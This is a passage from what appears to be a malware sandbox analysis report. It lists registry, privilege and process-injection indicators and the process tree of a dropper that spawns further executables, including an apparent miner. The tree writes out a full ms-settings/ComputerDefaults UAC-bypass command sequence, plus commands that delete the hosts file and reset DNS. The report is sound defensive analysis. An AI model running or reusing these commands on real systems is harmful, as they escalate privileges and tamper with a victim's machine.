Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-a5-09-32-99-c1\WpadDecisionTime = 842643345f40db01	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-a5-09-32-99-c1\WpadDecisionTime = 66ab7dbb5f40db01	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-a5-09-32-99-c1\WpadDecisionTime = 97912a0c5f40db01	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-a5-09-32-99-c1\WpadDecisionTime = d4b1aa465f40db01	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-a5-09-32-99-c1\WpadDecisionTime = 2577767f5f40db01	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-a5-09-32-99-c1\WpadDecisionTime = 4dc527925f40db01	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe

Modifies registry class 34 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\7586.vbs"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\1570.vbs"	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\2230.vbs"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open	reg.exe

NTFS ADS 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P	Process not Found
File opened for modification	C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P	Process not Found
File created	C:\IMG001.exe\:P:$DATA	Process not Found

Runs net.exe

Runs ping.exe 1 TTPs 42 IoCs

Remote System Discovery

T1018

pid	Process
25000	Process not Found
10372	Process not Found
14552	Process not Found
16448	Process not Found
17524	Process not Found
17620	Process not Found
20784	Process not Found
17704	Process not Found
18612	Process not Found
18692	Process not Found
21224	Process not Found
26576	Process not Found
14448	Process not Found
14656	Process not Found
14820	Process not Found
14424	Process not Found
20164	Process not Found
20248	Process not Found
13984	Process not Found
16268	Process not Found
16368	Process not Found
16436	Process not Found
17804	Process not Found
19344	Process not Found
15592	Process not Found
17188	Process not Found
18484	Process not Found
19072	Process not Found
23060	Process not Found
11076	Process not Found
12956	Process not Found
16168	Process not Found
19556	Process not Found
20312	Process not Found
18548	Process not Found
22764	Process not Found
15268	Process not Found
15388	Process not Found
15488	Process not Found
17896	Process not Found
18000	Process not Found
20848	Process not Found

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
199480	Process not Found
200180	Process not Found
208552	Process not Found

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3592	UqhRb9F.exe
3592	UqhRb9F.exe
3592	UqhRb9F.exe
3592	UqhRb9F.exe
3592	UqhRb9F.exe
3592	UqhRb9F.exe
3592	UqhRb9F.exe
3592	UqhRb9F.exe
3592	UqhRb9F.exe
3592	UqhRb9F.exe
3592	UqhRb9F.exe
3592	UqhRb9F.exe
3592	UqhRb9F.exe
3592	UqhRb9F.exe
3592	UqhRb9F.exe
3592	UqhRb9F.exe
3592	UqhRb9F.exe
2724	powershell.exe
2724	powershell.exe
2108	powershell.exe
2108	powershell.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe
1440	filer.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
3592	UqhRb9F.exe
3348	Explorer.EXE
2500	New Text Document mod.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2500	New Text Document mod.exe
Token: SeDebugPrivilege	3592	UqhRb9F.exe
Token: SeDebugPrivilege	1440	filer.exe
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeDebugPrivilege	2108	powershell.exe
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeIncreaseQuotaPrivilege	2084	wmic.exe
Token: SeSecurityPrivilege	2084	wmic.exe
Token: SeTakeOwnershipPrivilege	2084	wmic.exe
Token: SeLoadDriverPrivilege	2084	wmic.exe
Token: SeSystemProfilePrivilege	2084	wmic.exe
Token: SeSystemtimePrivilege	2084	wmic.exe
Token: SeProfSingleProcessPrivilege	2084	wmic.exe
Token: SeIncBasePriorityPrivilege	2084	wmic.exe
Token: SeCreatePagefilePrivilege	2084	wmic.exe
Token: SeBackupPrivilege	2084	wmic.exe
Token: SeRestorePrivilege	2084	wmic.exe
Token: SeShutdownPrivilege	2084	wmic.exe
Token: SeDebugPrivilege	2084	wmic.exe
Token: SeSystemEnvironmentPrivilege	2084	wmic.exe
Token: SeRemoteShutdownPrivilege	2084	wmic.exe
Token: SeUndockPrivilege	2084	wmic.exe
Token: SeManageVolumePrivilege	2084	wmic.exe
Token: 33	2084	wmic.exe
Token: 34	2084	wmic.exe
Token: 35	2084	wmic.exe
Token: 36	2084	wmic.exe
Token: SeIncreaseQuotaPrivilege	2084	wmic.exe
Token: SeSecurityPrivilege	2084	wmic.exe
Token: SeTakeOwnershipPrivilege	2084	wmic.exe
Token: SeLoadDriverPrivilege	2084	wmic.exe
Token: SeSystemProfilePrivilege	2084	wmic.exe
Token: SeSystemtimePrivilege	2084	wmic.exe
Token: SeProfSingleProcessPrivilege	2084	wmic.exe
Token: SeIncBasePriorityPrivilege	2084	wmic.exe
Token: SeCreatePagefilePrivilege	2084	wmic.exe
Token: SeBackupPrivilege	2084	wmic.exe
Token: SeRestorePrivilege	2084	wmic.exe
Token: SeShutdownPrivilege	2084	wmic.exe
Token: SeDebugPrivilege	2084	wmic.exe
Token: SeSystemEnvironmentPrivilege	2084	wmic.exe
Token: SeRemoteShutdownPrivilege	2084	wmic.exe
Token: SeUndockPrivilege	2084	wmic.exe
Token: SeManageVolumePrivilege	2084	wmic.exe
Token: 33	2084	wmic.exe
Token: 34	2084	wmic.exe
Token: 35	2084	wmic.exe
Token: 36	2084	wmic.exe
Token: SeIncreaseQuotaPrivilege	3104	wmic.exe
Token: SeSecurityPrivilege	3104	wmic.exe
Token: SeTakeOwnershipPrivilege	3104	wmic.exe
Token: SeLoadDriverPrivilege	3104	wmic.exe
Token: SeSystemProfilePrivilege	3104	wmic.exe
Token: SeSystemtimePrivilege	3104	wmic.exe
Token: SeProfSingleProcessPrivilege	3104	wmic.exe
Token: SeIncBasePriorityPrivilege	3104	wmic.exe
Token: SeCreatePagefilePrivilege	3104	wmic.exe
Token: SeBackupPrivilege	3104	wmic.exe
Token: SeRestorePrivilege	3104	wmic.exe
Token: SeShutdownPrivilege	3104	wmic.exe
Token: SeDebugPrivilege	3104	wmic.exe
Token: SeSystemEnvironmentPrivilege	3104	wmic.exe
Token: SeRemoteShutdownPrivilege	3104	wmic.exe
Token: SeUndockPrivilege	3104	wmic.exe

Suspicious use of FindShellTrayWindow 8 IoCs

pid	Process
3804	AmLzNi.exe
3804	AmLzNi.exe
3804	AmLzNi.exe
46644	Process not Found
46644	Process not Found
46644	Process not Found
98860	Process not Found
25876	Process not Found

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
3804	AmLzNi.exe
3804	AmLzNi.exe
3804	AmLzNi.exe
46644	Process not Found
46644	Process not Found
46644	Process not Found

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
3592	UqhRb9F.exe
1440	filer.exe
198880	Process not Found
198800	Process not Found
198808	Process not Found
198848	Process not Found
209280	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2500 wrote to memory of 3592	2500	New Text Document mod.exe	78
PID 2500 wrote to memory of 3592	2500	New Text Document mod.exe	78
PID 2500 wrote to memory of 3592	2500	New Text Document mod.exe	78
PID 2500 wrote to memory of 3716	2500	New Text Document mod.exe	79
PID 2500 wrote to memory of 3716	2500	New Text Document mod.exe	79
PID 3716 wrote to memory of 2920	3716	fHR9z2C.exe	80
PID 3716 wrote to memory of 2920	3716	fHR9z2C.exe	80
PID 2920 wrote to memory of 3656	2920	cmd.exe	82
PID 2920 wrote to memory of 3656	2920	cmd.exe	82
PID 3716 wrote to memory of 408	3716	fHR9z2C.exe	83
PID 3716 wrote to memory of 408	3716	fHR9z2C.exe	83
PID 408 wrote to memory of 984	408	cmd.exe	85
PID 408 wrote to memory of 984	408	cmd.exe	85
PID 408 wrote to memory of 3200	408	cmd.exe	86
PID 408 wrote to memory of 3200	408	cmd.exe	86
PID 3716 wrote to memory of 2432	3716	fHR9z2C.exe	88
PID 3716 wrote to memory of 2432	3716	fHR9z2C.exe	88
PID 2432 wrote to memory of 4644	2432	cmd.exe	90
PID 2432 wrote to memory of 4644	2432	cmd.exe	90
PID 4644 wrote to memory of 940	4644	ComputerDefaults.exe	91
PID 4644 wrote to memory of 940	4644	ComputerDefaults.exe	91
PID 940 wrote to memory of 4044	940	wscript.exe	92
PID 940 wrote to memory of 4044	940	wscript.exe	92
PID 3716 wrote to memory of 4276	3716	fHR9z2C.exe	94
PID 3716 wrote to memory of 4276	3716	fHR9z2C.exe	94
PID 3716 wrote to memory of 4624	3716	fHR9z2C.exe	96
PID 3716 wrote to memory of 4624	3716	fHR9z2C.exe	96
PID 4624 wrote to memory of 4324	4624	cmd.exe	98
PID 4624 wrote to memory of 4324	4624	cmd.exe	98
PID 3716 wrote to memory of 3108	3716	fHR9z2C.exe	139
PID 3716 wrote to memory of 3108	3716	fHR9z2C.exe	139
PID 3108 wrote to memory of 3952	3108	cmd.exe	101
PID 3108 wrote to memory of 3952	3108	cmd.exe	101
PID 3716 wrote to memory of 4676	3716	fHR9z2C.exe	102
PID 3716 wrote to memory of 4676	3716	fHR9z2C.exe	102
PID 4676 wrote to memory of 3056	4676	cmd.exe	104
PID 4676 wrote to memory of 3056	4676	cmd.exe	104
PID 4676 wrote to memory of 1480	4676	cmd.exe	105
PID 4676 wrote to memory of 1480	4676	cmd.exe	105
PID 3716 wrote to memory of 2540	3716	fHR9z2C.exe	106
PID 3716 wrote to memory of 2540	3716	fHR9z2C.exe	106
PID 2540 wrote to memory of 4616	2540	cmd.exe	108
PID 2540 wrote to memory of 4616	2540	cmd.exe	108
PID 4616 wrote to memory of 2036	4616	ComputerDefaults.exe	109
PID 4616 wrote to memory of 2036	4616	ComputerDefaults.exe	109
PID 2036 wrote to memory of 2496	2036	wscript.exe	110
PID 2036 wrote to memory of 2496	2036	wscript.exe	110
PID 3716 wrote to memory of 752	3716	fHR9z2C.exe	112
PID 3716 wrote to memory of 752	3716	fHR9z2C.exe	112
PID 3716 wrote to memory of 2820	3716	fHR9z2C.exe	114
PID 3716 wrote to memory of 2820	3716	fHR9z2C.exe	114
PID 2820 wrote to memory of 3164	2820	cmd.exe	116
PID 2820 wrote to memory of 3164	2820	cmd.exe	116
PID 3716 wrote to memory of 484	3716	fHR9z2C.exe	117
PID 3716 wrote to memory of 484	3716	fHR9z2C.exe	117
PID 484 wrote to memory of 1936	484	cmd.exe	119
PID 484 wrote to memory of 1936	484	cmd.exe	119
PID 3716 wrote to memory of 3860	3716	fHR9z2C.exe	120
PID 3716 wrote to memory of 3860	3716	fHR9z2C.exe	120
PID 3860 wrote to memory of 3044	3860	cmd.exe	122
PID 3860 wrote to memory of 3044	3860	cmd.exe	122
PID 3860 wrote to memory of 4564	3860	cmd.exe	123
PID 3860 wrote to memory of 4564	3860	cmd.exe	123
PID 3716 wrote to memory of 3964	3716	fHR9z2C.exe	124

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	Process not Found

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Process not Found

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:632
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:468

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:988

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:772

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1132

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1152

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1296

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1500

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1532
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:432
- - C:\Windows\SysWOW64\svchost.exe
    "C:\Windows\System32\svchost.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1688

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1872

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2060

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2068

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2396

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2504

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2520

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:424

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2228

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3348
- C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
  "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2500
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4700
- - C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe
    "C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:3592
- - C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe
    "C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3716
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2920
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:3656
  - - C:\Windows\system32\cmd.exe
      /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2230.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:408
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2230.vbs" /f
        5⤵
        Modifies registry class
        
        PID:984
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        5⤵
        Modifies registry class
        
        PID:3200
  - - C:\Windows\system32\cmd.exe
      /c start /B ComputerDefaults.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2432
    - - C:\Windows\system32\ComputerDefaults.exe
        
        ComputerDefaults.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4644
      - C:\Windows\system32\wscript.exe
        
        "wscript.exe" C:\Users\Admin\AppData\Local\Temp\2230.vbs
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:940
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
        7⤵
        
        PID:4044
  - - C:\Windows\system32\cmd.exe
      /c del /f C:\Users\Admin\AppData\Local\Temp\2230.vbs
      4⤵
      PID:4276
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4624
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        Modifies registry class
        
        PID:4324
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3108
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:3952
  - - C:\Windows\system32\cmd.exe
      /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\7586.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4676
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\7586.vbs" /f
        5⤵
        Modifies registry class
        
        PID:3056
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        5⤵
        Modifies registry class
        
        PID:1480
  - - C:\Windows\system32\cmd.exe
      /c start /B ComputerDefaults.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2540
    - - C:\Windows\system32\ComputerDefaults.exe
        
        ComputerDefaults.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4616
      - C:\Windows\system32\wscript.exe
        
        "wscript.exe" C:\Users\Admin\AppData\Local\Temp\7586.vbs
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2036
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" interface ip set dns "Wi-Fi" dhcp
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2496
  - - C:\Windows\system32\cmd.exe
      /c del /f C:\Users\Admin\AppData\Local\Temp\7586.vbs
      4⤵
      PID:752
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2820
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        Modifies registry class
        
        PID:3164
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:484
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:1936
  - - C:\Windows\system32\cmd.exe
